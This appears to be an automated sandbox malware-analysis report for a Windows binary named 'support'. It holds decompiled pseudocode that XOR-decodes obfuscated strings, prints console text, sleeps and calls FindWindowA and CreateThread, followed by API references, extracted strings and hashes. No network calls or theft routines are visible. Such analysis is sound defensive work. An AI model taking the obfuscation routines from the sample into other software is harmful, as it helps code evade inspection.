								__eflags = _t450 - 2;
								if(_t450 != 2) {
									continue;
								}
								goto L38;
							} else {
								goto L33;
							}
							do {
								L33:
								Sleep(0x3e8);
								_t587 = E003BC340( &_v48);
								_v8 = 8;
								E003B4E10( &_v48);
								_v8 = 3;
								__eflags =  *((intOrPtr*)(_t587 + 0x10)) - 1;
							} while ( *((intOrPtr*)(_t587 + 0x10)) < 1);
							goto L34;
						}
						__eflags =  *0x6f62f6;
						if( *0x6f62f6 == 0) {
							__eflags = _t571;
							if(_t571 == 0) {
								goto L30;
							}
							asm("movaps xmm0, [0x3c1680]");
							_t846 = 0;
							__eflags = 0;
							asm("movups [ebp-0x3c], xmm0");
							_v32 = 0xb1a1c0f;
							asm("movaps xmm0, [0x3c1850]");
							asm("movups [ebp-0x2c], xmm0");
							_v28 = 0x4f0a;
							_v26 = 0;
							do {
								 *(_t867 + _t846 - 0x3b) =  *(_t867 + _t846 - 0x3b) ^ _v64;
								_t846 = _t846 + 1;
								__eflags = _t846 - 0x25;
							} while (_t846 < 0x25);
							_v26 = 0;
							E003B5420(__imp__?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,  &_v63);
							__imp__??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z();
							Sleep(0xfa0);
							_v8 = 7;
							E003B4E10( &_v112, E003B5660);
							_v8 = 0;
							goto L37;
						}
						asm("movaps xmm0, [0x3c1fa0]");
						_t848 = 0;
						__eflags = 0;
						asm("movups [ebp-0x38], xmm0");
						_v28 = 0x257077;
						asm("movaps xmm0, [0x3c1ed0]");
						asm("movups [ebp-0x28], xmm0");
						do {
							 *(_t867 + _t848 - 0x37) =  *(_t867 + _t848 - 0x37) ^ _v60;
							_t848 = _t848 + 1;
							__eflags = _t848 - 0x22;
						} while (_t848 < 0x22);
						_v25 = 0;
						E003B5420(__imp__?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,  &_v59);
						__imp__??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z(E003B5660);
						asm("movaps xmm0, [0x3c18c0]");
						_t850 = 0;
						__eflags = 0;
						asm("movups [ebp-0x38], xmm0");
						_v28 = 0x450f0e;
						asm("movaps xmm0, [0x3c1730]");
						asm("movups [ebp-0x28], xmm0");
						do {
							 *(_t867 + _t850 - 0x37) =  *(_t867 + _t850 - 0x37) ^ _v60;
							_t850 = _t850 + 1;
							__eflags = _t850 - 0x22;
						} while (_t850 < 0x22);
						_v25 = 0;
						E003B5420(__imp__?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,  &_v59);
						__imp__??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z();
						Sleep(0xfa0);
						_v8 = 6;
						E003B4E10( &_v112, E003B5660);
						_v8 = 0;
						goto L37;
					}
					asm("movaps xmm0, [0x3c1e70]");
					_t767 = 0;
					asm("movups [ebp-0x2c], xmm0");
					_v32 = 0x6d6b7170;
					_v28 = 0x222f226c;
					_v24 = 0;
					asm("o16 nop [eax+eax]");
					do {
						 *(_t867 + _t767 - 0x2b) =  *(_t867 + _t767 - 0x2b) ^ _v48;
						_t767 = _t767 + 1;
						__eflags = _t767 - 0x17;
					} while (_t767 < 0x17);
					_v24 = 0;
					E003B5420(__imp__?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,  &_v47);
					__imp__??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z(E003B5660);
					asm("movaps xmm0, [0x3c1740]");
					_t769 = 0;
					__eflags = 0;
					asm("movups [ebp-0x34], xmm0");
					_v40 = 0x4b0f405b;
					_v36 = 0x43415840;
					_v32 = 0xf4b4e40;
					_v28 = 0xf02;
					_v26 = 0;
					do {
						 *(_t867 + _t769 - 0x33) =  *(_t867 + _t769 - 0x33) ^ _v56;
						_t769 = _t769 + 1;
						__eflags = _t769 - 0x1d;
					} while (_t769 < 0x1d);
					_v26 = 0;
					E003B5420(__imp__?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,  &_v55);
					__imp__??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z(E003B5660);
					__imp__getchar();
					_t458 = E003BCDA0( &_v55, _t854, _t857, __eflags);
					_t771 = 0;
					__eflags = _t458;
					if(_t458 == 0) {
						asm("movaps xmm0, [0x3c1ff0]");
						asm("movups [ebp-0x38], xmm0");
						_v28 = 0x39347a7b;
						asm("movaps xmm0, [0x3c2000]");
						asm("movups [ebp-0x28], xmm0");
						_v24 = 0x34;
						do {
							 *(_t867 + _t771 - 0x37) =  *(_t867 + _t771 - 0x37) ^ _v60;
							_t771 = _t771 + 1;
							__eflags = _t771 - 0x24;
						} while (_t771 < 0x24);
						_t766 =  &_v59;
						_v23 = 0;
						L41:
						E003B5420(__imp__?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A, _t766);
						__imp__??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z(E003B5660);
						Sleep(0x1388);
						goto L42;
					}
					asm("movaps xmm0, [0x3c18f0]");
					asm("movups [ebp-0x30], xmm0");
					_v36 = 0x6c756d66;
					_v32 = 0x66636d6e;
					_v28 = 0x2f226667;
					_v24 = 0x22;
					do {
						 *(_t867 + _t771 - 0x2f) =  *(_t867 + _t771 - 0x2f) ^ _v52;
						_t771 = _t771 + 1;
						__eflags = _t771 - 0x1c;
					} while (_t771 < 0x1c);
					_t766 =  &_v51;
					_v23 = 0;
				}
			}

0x003b3b33
0x003b3b35
0x003b3b40
0x003b3b41
0x003b3b47
0x003b3b4c
0x003b3b4e
0x003b3b51
0x003b3b52
0x003b3b53
0x003b3b54
0x003b3b58
0x003b3b65
0x003b4277
0x003b427a
0x003b4288
0x003b4292
0x003b4292
0x003b3b73
0x003b3b78
0x003b3b8b
0x003b3b93
0x003b3b9b
0x003b3ba0
0x003b3ba5
0x003b3bae
0x003b421d
0x003b421d
0x003b4224
0x003b4224
0x003b4226
0x003b4230
0x003b4230
0x003b4236
0x003b423d
0x003b423e
0x003b423e
0x003b4243
0x003b424a
0x003b3bb4
0x003b3bb4
0x003b3bba
0x003b3bc0
0x003b3bd0
0x003b3bdf
0x003b3beb
0x003b3bed
0x003b3c02
0x003b3c02
0x003b3c07
0x003b3c09
0x003b3c13
0x003b3c1d
0x003b3c1f
0x003b3c26
0x003b3c2a
0x003b3c30
0x003b3c30
0x003b3c37
0x003b3c3b
0x00000000
0x00000000
0x003b3c3d
0x003b3c3d
0x003b3c3d
0x003b3c51
0x003b3c55
0x003b3c61
0x003b3c68
0x003b3c71
0x003b3c79
0x003b3c86
0x003b3c8e
0x003b3c9a
0x003b3ca2
0x003b3cae
0x003b3cb4
0x003b3cbb
0x003b3cbb
0x003b3cbd
0x003b3cc4
0x003b3cd0
0x003b3cd6
0x003b3cdd
0x003b3cde
0x003b3cde
0x003b3cef
0x003b3cf6
0x003b3d00
0x003b3d07
0x003b3d10
0x003b3d18
0x003b3d25
0x003b3d2d
0x003b3d39
0x003b3d41
0x003b3d4d
0x003b3d53
0x003b3d55
0x003b3d5f
0x003b3d69
0x003b3d69
0x003b3d6b
0x003b3d75
0x003b3d7e
0x003b3d85
0x003b3d85
0x003b3d8c
0x003b3d8d
0x003b3d90
0x00000000
0x00000000
0x003b3d92
0x003b3d92
0x003b3d92
0x003b3da6
0x003b3dad
0x003b3db9
0x003b3dbf
0x003b3dc6
0x003b3dc6
0x003b3dc8
0x003b3dcc
0x003b3dd3
0x003b3dda
0x003b3dde
0x003b3de5
0x003b3df0
0x003b3df3
0x003b3df7
0x003b3df8
0x003b3df8
0x003b3e06
0x003b3e0a
0x003b3e16
0x003b3e1e
0x003b3e27
0x003b3e2f
0x003b3e3c
0x003b3e42
0x003b3e44
0x003b3e56
0x003b3e5c
0x003b3e6a
0x003b3e7a
0x003b3e82
0x003b3e8b
0x003b3e93
0x003b3e9a
0x003b3ea4
0x003b3ead
0x003b3eb3
0x003b3eb5
0x003b3eb8
0x003b3eba
0x003b48b8
0x003b48bf
0x003b48c1
0x003b48c5
0x003b48cc
0x003b48d3
0x003b48da
0x003b48e0
0x003b48e3
0x003b48e7
0x003b48e8
0x003b48e8
0x003b48f6
0x003b48fa
0x003b4906
0x003b490c
0x003b4914
0x003b491f
0x003b4929
0x003b492b
0x003b4931
0x003b493c
0x003b493e
0x003b4943
0x003b4948
0x003b494b
0x003b494d
0x003b4955
0x003b4959
0x003b495c
0x003b495e
0x003b4960
0x003b4962
0x003b496f
0x003b4979
0x003b497d
0x003b497f
0x003b4984
0x003b4989
0x003b4998
0x003b499d
0x003b49a2
0x003b49a5
0x003b49a7
0x003b49aa
0x003b49ad
0x003b49b2
0x003b49b4
0x003b49b6
0x003b49b6
0x003b49b4
0x003b49bd
0x003b49c2
0x003b49c9
0x003b4a41
0x003b4a43
0x003b4a4d
0x003b4a57
0x003b4a59
0x003b4a60
0x003b4a66
0x003b4a70
0x003b4a70
0x003b4a77
0x003b4a78
0x003b4a7b
0x00000000
0x00000000
0x003b4a7d
0x003b4a7d
0x003b4a91
0x003b4a95
0x003b4aa1
0x003b4aac
0x003b4aae
0x003b4ab1
0x00000000
0x003b49cb
0x003b49cb
0x003b49d2
0x003b49d2
0x003b49d4
0x003b49db
0x003b49f0
0x003b49f6
0x003b49fd
0x003b49fe
0x003b49fe
0x003b4a0f
0x003b4a16
0x003b4a22
0x003b4a28
0x003b4a32
0x003b4a37
0x003b426f
0x003b4272
0x00000000
0x003b4272
0x003b49c9
0x003b3ec2
0x003b3ecb
0x003b3ed3
0x003b3eda
0x003b3ee4
0x003b3eed
0x003b3ef3
0x003b3ef5
0x003b3ef8
0x003b3efa
0x003b4293
0x003b429a
0x003b429a
0x003b429c
0x003b42a3
0x003b42ad
0x003b42b7
0x003b42c1
0x003b42d0
0x003b42d6
0x003b42dd
0x003b42de
0x003b42de
0x003b42ef
0x003b42f1
0x003b42f8
0x003b4304
0x003b4312
0x003b4314
0x003b4319
0x003b431d
0x003b431f
0x003b4325
0x003b4328
0x003b432a
0x003b4334
0x003b4335
0x003b4335
0x003b4338
0x003b4338
0x003b433b
0x003b433d
0x003b4341
0x003b4341
0x003b4341
0x003b4344
0x003b434a
0x003b435a
0x003b435c
0x003b436c
0x003b436c
0x003b436e
0x003b439e
0x003b439e
0x003b43a2
0x003b43ad
0x003b43b4
0x003b4646
0x003b464d
0x003b464d
0x003b464f
0x003b4656
0x003b4660
0x003b466a
0x003b4680
0x003b4686
0x003b468d
0x003b468e
0x003b468e
0x003b469f
0x003b46a6
0x003b46b2
0x003b46b8
0x003b46ba
0x003b46c4
0x003b46ce
0x003b46d0
0x003b46da
0x003b46e3
0x003b46ea
0x003b46f0
0x003b46f0
0x003b46f7
0x003b46f8
0x003b46fb
0x00000000
0x00000000
0x003b46fd
0x003b46fd
0x003b4711
0x003b4718
0x003b4724
0x003b472a
0x003b4731
0x003b4733
0x003b473a
0x003b4744
0x003b474b
0x003b4752
0x003b475c
0x003b4765
0x003b4770
0x003b4776
0x003b477d
0x003b477e
0x003b477e
0x003b478f
0x003b4796
0x003b47a2
0x003b47a8
0x003b47af
0x003b47b1
0x003b47b8
0x003b47c2
0x003b47c9
0x003b47d0
0x003b47d6
0x003b47dd
0x003b47de
0x003b47de
0x003b47ef
0x003b47f6
0x003b4802
0x003b4808
0x003b480f
0x003b480f
0x003b4811
0x003b4818
0x003b4822
0x003b4829
0x003b4830
0x003b483a
0x003b4844
0x003b484d
0x003b4860
0x003b4866
0x003b486d
0x003b486e
0x003b486e
0x003b487f
0x003b4886
0x003b4892
0x003b489d
0x003b489d
0x003b48a2
0x003b48a6
0x003b48ae
0x00000000
0x003b48ae
0x003b43ba
0x003b43ba
0x003b43c1
0x003b43c1
0x003b43c3
0x003b43ca
0x003b43d4
0x003b43e0
0x003b43e6
0x003b43ed
0x003b43ee
0x003b43ee
0x003b43ff
0x003b4406
0x003b4410
0x003b4417
0x003b441d
0x003b4422
0x003b442c
0x003b4431
0x003b4437
0x003b443c
0x003b4448
0x003b444e
0x003b4455
0x003b4455
0x003b4457
0x003b445e
0x003b4468
0x003b4472
0x003b4480
0x003b4486
0x003b448d
0x003b448e
0x003b448e
0x003b449f
0x003b44a6
0x003b44b2
0x003b44b8
0x003b44c0
0x003b44cb
0x003b44d5
0x003b44d7
0x003b44dd
0x003b44e2
0x003b44e8
0x003b44ea
0x003b44ec
0x003b44ef
0x003b44f1
0x003b44f6
0x003b44fb
0x003b44fe
0x003b4500
0x003b4508
0x003b450c
0x003b450e
0x003b4510
0x003b4512
0x003b451f
0x003b4529
0x003b452d
0x003b452f
0x003b4534
0x003b4539
0x003b4548
0x003b454d
0x003b4552
0x003b4555
0x003b4557
0x003b455a
0x003b455d
0x003b4562
0x003b4564
0x003b4566
0x003b4566
0x003b4564
0x003b4576
0x003b457f
0x003b4584
0x003b458a
0x003b458f
0x003b4596
0x003b45d3
0x003b45d5
0x003b45df
0x003b45e9
0x003b45e9
0x003b45eb
0x003b45f2
0x003b4600
0x003b4600
0x003b4607
0x003b4608
0x003b460b
0x00000000
0x00000000
0x003b460d
0x003b460d
0x003b4615
0x003b4619
0x00000000
0x003b4598
0x003b4598
0x003b459f
0x003b459f
0x003b45a1
0x003b45a8
0x003b45b1
0x003b45b7
0x003b45be
0x003b45bf
0x003b45bf
0x003b45c4
0x003b45cb
0x003b461f
0x003b4625
0x003b4631
0x003b4637
0x003b489d
0x00000000
0x003b489d
0x003b4596
0x003b43a4
0x00000000
0x003b4370
0x003b4370
0x003b4376
0x003b4378
0x003b4378
0x003b437a
0x00000000
0x00000000
0x003b437c
0x003b437d
0x003b4380
0x003b4382
0x00000000
0x00000000
0x00000000
0x003b4384
0x003b4390
0x003b4399
0x00000000
0x003b4399
0x003b436e
0x003b3f02
0x003b3f0b
0x003b3f13
0x003b3f1a
0x003b3f24
0x003b3f2d
0x003b3f33
0x003b3f35
0x003b3f38
0x003b3f3a
0x00000000
0x00000000
0x003b3f40
0x003b3f45
0x003b3f47
0x003b408d
0x003b408d
0x003b4094
0x003b4094
0x003b4096
0x003b409a
0x003b40a1
0x003b40a8
0x003b40b0
0x003b40b3
0x003b40b7
0x003b40b8
0x003b40b8
0x003b40c6
0x003b40ca
0x003b40d6
0x003b40dc
0x003b40f0
0x003b40f9
0x003b4104
0x003b4108
0x003b410d
0x003b4111
0x003b4114
0x003b413d
0x003b413d
0x003b4144
0x003b4146
0x003b414d
0x003b4156
0x003b4160
0x003b4166
0x003b416d
0x003b416e
0x003b416e
0x003b417f
0x003b4186
0x003b4190
0x003b4197
0x003b419d
0x003b41a4
0x003b41aa
0x003b41af
0x003b41b9
0x003b41bc
0x003b41bc
0x003b41be
0x003b41c4
0x003b41c9
0x003b41d5
0x003b41de
0x003b41ea
0x003b41f4
0x003b41f9
0x003b41fd
0x003b4202
0x003b4208
0x003b420a
0x003b420f
0x003b4214
0x003b4217
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x003b4116
0x003b4116
0x003b411b
0x003b4120
0x003b412b
0x003b412f
0x003b4134
0x003b4138
0x003b4138
0x00000000
0x003b4116
0x003b3f4d
0x003b3f54
0x003b4018
0x003b401a
0x00000000
0x00000000
0x003b401c
0x003b4023
0x003b4023
0x003b4025
0x003b4029
0x003b4030
0x003b4037
0x003b403b
0x003b4041
0x003b4045
0x003b4048
0x003b404c
0x003b404d
0x003b404d
0x003b405b
0x003b405f
0x003b406b
0x003b4076
0x003b407b
0x003b407f
0x003b4084
0x00000000
0x003b4084
0x003b3f5a
0x003b3f61
0x003b3f61
0x003b3f63
0x003b3f67
0x003b3f6e
0x003b3f75
0x003b3f80
0x003b3f83
0x003b3f87
0x003b3f88
0x003b3f88
0x003b3f96
0x003b3f9a
0x003b3fa6
0x003b3fac
0x003b3fb3
0x003b3fb3
0x003b3fb5
0x003b3fb9
0x003b3fc0
0x003b3fc7
0x003b3fd0
0x003b3fd3
0x003b3fd7
0x003b3fd8
0x003b3fd8
0x003b3fe6
0x003b3fea
0x003b3ff6
0x003b4001
0x003b4006
0x003b400a
0x003b400f
0x00000000
0x003b400f
0x003b4abb
0x003b4ac2
0x003b4ac4
0x003b4ac8
0x003b4acf
0x003b4ad6
0x003b4ada
0x003b4ae0
0x003b4ae3
0x003b4ae7
0x003b4ae8
0x003b4ae8
0x003b4af6
0x003b4afa
0x003b4b06
0x003b4b0c
0x003b4b13
0x003b4b13
0x003b4b15
0x003b4b19
0x003b4b20
0x003b4b27
0x003b4b2e
0x003b4b34
0x003b4b38
0x003b4b3b
0x003b4b3f
0x003b4b40
0x003b4b40
0x003b4b4e
0x003b4b52
0x003b4b5e
0x003b4b64
0x003b4b6a
0x003b4b6f
0x003b4b71
0x003b4b73
0x003b4bb9
0x003b4bc0
0x003b4bc4
0x003b4bcb
0x003b4bd2
0x003b4bd6
0x003b4be0
0x003b4be3
0x003b4be7
0x003b4be8
0x003b4be8
0x003b4bed
0x003b4bf0
0x003b4250
0x003b4256
0x003b4262
0x003b426d
0x00000000
0x003b426d
0x003b4b75
0x003b4b7c
0x003b4b80
0x003b4b87
0x003b4b8e
0x003b4b95
0x003b4ba0
0x003b4ba3
0x003b4ba7
0x003b4ba8
0x003b4ba8
0x003b4bad
0x003b4bb0
0x003b4bb0

APIs

SetConsoleTitleA.KERNELBASE(006F5BB4,003C145D,4B5EE95B), ref: 003B3B93

Part of subcall function 003B34A0: GetStdHandle.KERNEL32(000000F5), ref: 003B34BA
Part of subcall function 003B34A0: GetConsoleScreenBufferInfo.KERNELBASE(00000000,?), ref: 003B34C7
Part of subcall function 003B34A0: FillConsoleOutputCharacterA.KERNELBASE(00000000,00000020,?,?,?), ref: 003B34E4
Part of subcall function 003B34A0: FillConsoleOutputAttribute.KERNELBASE(00000000,?,?,?,?), ref: 003B34F4
Part of subcall function 003B34A0: SetConsoleCursorPosition.KERNELBASE(00000000,?), ref: 003B34FC

??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP140(003B5660,003C147C,00000000,Dec 27 2021), ref: 003B3CAE
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP140(003B5660), ref: 003B3D4D
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP140(003B5660), ref: 003B3DB9

Part of subcall function 003B4CA0: memmove.VCRUNTIME140(?,?,?,76C86490,73413D00,?,?,003B3C07,00000000,003C147C,00000000,00000001,003C147C,00000000,Dec 27 2021), ref: 003B4CD9

??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP140(003B5660), ref: 003B3E16
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP140(003B5660), ref: 003B3E7A
strstr.VCRUNTIME140(?,?), ref: 003B3EB3
strstr.VCRUNTIME140(?,?), ref: 003B3EF3
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP140(003B5660), ref: 003B3FA6
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP140(003B5660), ref: 003B3FF6
Sleep.KERNEL32(00000FA0), ref: 003B4001
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP140(003B5660), ref: 003B406B
Sleep.KERNEL32(00000FA0), ref: 003B4076
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP140(003B5660), ref: 003B40D6
CreateThread.KERNEL32 ref: 003B40F0
Sleep.KERNEL32(000003E8), ref: 003B411B
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP140(003B5660), ref: 003B41D5
Sleep.KERNEL32(00001388), ref: 003B41F4
strstr.VCRUNTIME140(?,?), ref: 003B3F33

Part of subcall function 003B5420: ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@XZ.MSVCP140(4B5EE95B,?,?), ref: 003B54FE
Part of subcall function 003B5420: ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(00000004,00000000), ref: 003B560C
Part of subcall function 003B5420: ?uncaught_exception@std@@YA_NXZ.MSVCP140 ref: 003B5619

??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP140(003B5660), ref: 003B4262
Sleep.KERNEL32(00001388), ref: 003B426D
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP140(003B5660), ref: 003B4304
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP140(003B5660,003C145D), ref: 003B4448
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP140(003B5660), ref: 003B44B2
FindWindowA.USER32(?,00000000), ref: 003B450C
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP140(003B5660,?), ref: 003B4631
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP140(003B5660,003C145D), ref: 003B46B2
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP140(003B5660), ref: 003B4724
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP140(003B5660), ref: 003B47A2
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP140(003B5660), ref: 003B4802
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP140(003B5660), ref: 003B4892
Sleep.KERNEL32(00000E10), ref: 003B489D
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP140(003B5660), ref: 003B4906
FindWindowA.USER32(?,00000000), ref: 003B495C
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP140(003B5660), ref: 003B4A22
Sleep.KERNEL32(000010CC), ref: 003B4A32
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP140(003B5660), ref: 003B4AA1
Sleep.KERNEL32(000010CC), ref: 003B4AAC
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP140(003B5660), ref: 003B4B06
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP140(003B5660), ref: 003B4B5E
getchar.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 003B4B64

Part of subcall function 003B4C20: memchr.VCRUNTIME140(?,00000020,76C8648F,76C86490,73413D00,003B3BE8,003C147C,00000000,Dec 27 2021), ref: 003B4C40
Part of subcall function 003B4C20: memchr.VCRUNTIME140(00000001,00000020,76C8648F), ref: 003B4C78

Strings

L, xrefs: 003B4A60
23wz, xrefs: 003B45EB
nqx{, xrefs: 003B473A
nmcf, xrefs: 003B4B87
[^K/, xrefs: 003B3B47
tTYT', xrefs: 003B3C3D
\, xrefs: 003B49DB
{z49, xrefs: 003B4BC4
4, xrefs: 003B4BD6
p, xrefs: 003B4962
"/3+, xrefs: 003B4656
Dec 27 2021, xrefs: 003B3BC8
]}p}/29(>)}pW, xrefs: 003B3D92
E_, xrefs: 003B4844
fmul, xrefs: 003B4B80
Unknown, xrefs: 003B3C5A
EHCA, xrefs: 003B483A

Memory Dump Source

Source File: 00000000.00000002.517793514.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true

Associated: 00000000.00000002.517759190.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517881948.00000000003C1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517890121.00000000003C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517948063.00000000003C6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518495863.0000000000476000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518662878.0000000000530000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518991585.00000000006F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.519000461.00000000006F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_support.jbxd

Yara matches

Similarity

API ID: V01@$D@std@@@std@@U?$char_traits@$??6?$basic_ostream@V01@@$Sleep$Console$strstr$FillFindOutputWindowmemchr$?flush@?$basic_ostream@?setstate@?$basic_ios@?uncaught_exception@std@@AttributeBufferCharacterCreateCursorHandleInfoPositionScreenThreadTitleV12@getcharmemmove
String ID: "/3+$23wz$4$Dec 27 2021$EHCA$E_$L$Unknown$[^K/$\$]}p}/29(>)}pW$fmul$nmcf$nqx{$p$tTYT'${z49
API String ID: 2986431095-3699392195
Opcode ID: 1fbb444b69c033a5eb8ed6c5d3183dc9bee5caca7a166e21290cdfab01f5d5b2
Instruction ID: 6c9efd465b279c1b70366b572f8034b8efceccefed1d4ef094af1e483bd095e9
Opcode Fuzzy Hash: 1fbb444b69c033a5eb8ed6c5d3183dc9bee5caca7a166e21290cdfab01f5d5b2
Instruction Fuzzy Hash: BDA2F520D052D8CADF12CFB4D945BEDBBB1AF6A308F5491D8C5886B653DB701A88CF61

Uniqueness

Uniqueness Score: -1.00%

Function 003B1050 Relevance: 57.8, Strings: 45, Instructions: 1510COMMON

Download Yara Rule

Strings

yd", xrefs: 003B14A1
][AK, xrefs: 003B17F1
:|, xrefs: 003B23C9
8, xrefs: 003B16A5
hriv, xrefs: 003B1B4D
NV, xrefs: 003B174A
:' 6, xrefs: 003B1E36
K, xrefs: 003B1C81
[^K/, xrefs: 003B1068
:"j, xrefs: 003B1529
pxqr, xrefs: 003B1489
LJPZ, xrefs: 003B1221
?5, xrefs: 003B1E40
aat, xrefs: 003B2091
AF^)MH[L)PF\6(, xrefs: 003B1F4B
a'.3, xrefs: 003B135D
ybil, xrefs: 003B13F8
<, xrefs: 003B28B9
F, xrefs: 003B2209
e#*7, xrefs: 003B1089
Z\FL, xrefs: 003B1736
T, xrefs: 003B1D94
ssl, xrefs: 003B2589
P, xrefs: 003B1EC9
<76s, xrefs: 003B1E1E
at$f, xrefs: 003B2079
dbc-, xrefs: 003B13EE
NIRO, xrefs: 003B2131
k, xrefs: 003B10B9
42(", xrefs: 003B1356
L, xrefs: 003B22B5
a8.4, xrefs: 003B1364
h, xrefs: 003B1AC9
s , xrefs: 003B1B5B
e<*0, xrefs: 003B10A1
q, xrefs: 003B1698
;6s0, xrefs: 003B1E06
X, xrefs: 003B2459
`rid, xrefs: 003B1B54
', xrefs: 003B2955
dq!e, xrefs: 003B1B46
QVUP, xrefs: 003B1919
t,, xrefs: 003B1402
:9!n,"!-%=n*!9 , xrefs: 003B1603
1,=Y, xrefs: 003B21D9

Memory Dump Source

Source File: 00000000.00000002.517793514.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true

Associated: 00000000.00000002.517759190.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517881948.00000000003C1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517890121.00000000003C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517948063.00000000003C6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518495863.0000000000476000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518662878.0000000000530000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518991585.00000000006F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.519000461.00000000006F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_support.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID: AF^)MH[L)PF\6($ <$'$1,=Y$42("$8$:"j$:' 6$:9!n,"!-%=n*!9 $:|$;6s0$<76s$?5$F$K$L$LJPZ$NIRO$NV$P$QVUP$T$X$Z\FL$[^K/$][AK$`rid$a'.3$a8.4$aat$at$f$dbc-$dq!e$e#*7$e<*0$h$hriv$k$pxqr$q$s $ssl$t,$ybil$yd"
API String ID: 3668304517-2508131614
Opcode ID: 289a6ee6cf83d64bd691035d3179847e972630f6ab97801c835fadcb961318c9
Instruction ID: cea775d9ba2fc85fedf4abd45c84adb831b0c765942afd1fced2585f5e0b0b5e
